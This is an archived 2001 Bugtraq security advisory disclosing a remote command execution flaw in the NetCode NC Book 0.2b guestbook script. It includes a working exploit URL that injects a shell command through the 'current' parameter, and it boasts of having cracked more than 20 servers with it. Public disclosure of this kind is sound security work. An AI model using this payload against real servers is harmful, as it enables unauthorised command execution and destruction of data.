NetCode NC Book 0.2b remote command execution vulnerability
From: Hannibal Lector (digitalseed@poizonb0x.org)Date: 08/13/01
- Previous message: Hannibal Lector: "SIX-webboard 2.01 "show files" vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 13 Aug 2001 19:14:38 -0000 Message-ID: <20010813191438.23554.qmail@securityfocus.com> From: Hannibal Lector <digitalseed@poizonb0x.org> To: bugtraq@securityfocus.com Subject: NetCode NC Book 0.2b remote command execution vulnerability
* more than 20 servers were successfly cracked
using this 'little' hole *
------[ PoizonB0x Advisory#6 pb0x-06-08-2001 ]---------
-NAME:
NetCode NC Book 0.2b remote command execution
vulnerability.
-DESCRIPTION:
NetCode's GuestBook. Find more info about it here:
http://netcode.lgg.ru/vault/ncbook/
-PROBLEM:
A pretty big hole in the main script of that guestbook
leads to command execution on the remote server
running this vulnerable perl script.
-EXPLOIT:
ex.: http://target/cgi-bin/ncbook/book.cgi?
action=default¤t=|ls -
la/|&form_tid=996604045&prev=main.html&list_mess
age_index=10
!The above line if given will output the file contents of
the kernel dir. Also you can execute any commands
(ls, cat, rm etc)
-AUTHORs:
Discovery: digitalseed and ksenor
Advisory: digitalseed
-DISCLAIMER:
PoizonB0x may not be held liable for the use or
potential effects of these programs or advisories, nor
the content contained within. Use them at your own
risk.
-COPYRIGHT:
PoizonB0x Crew -
www.poizonb0x.org (c) 2000-2001
L...Future Security...l
------[ PoizonB0x Advisory#1 pb0x-06-08-2001 ]---------
- Previous message: Hannibal Lector: "SIX-webboard 2.01 "show files" vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
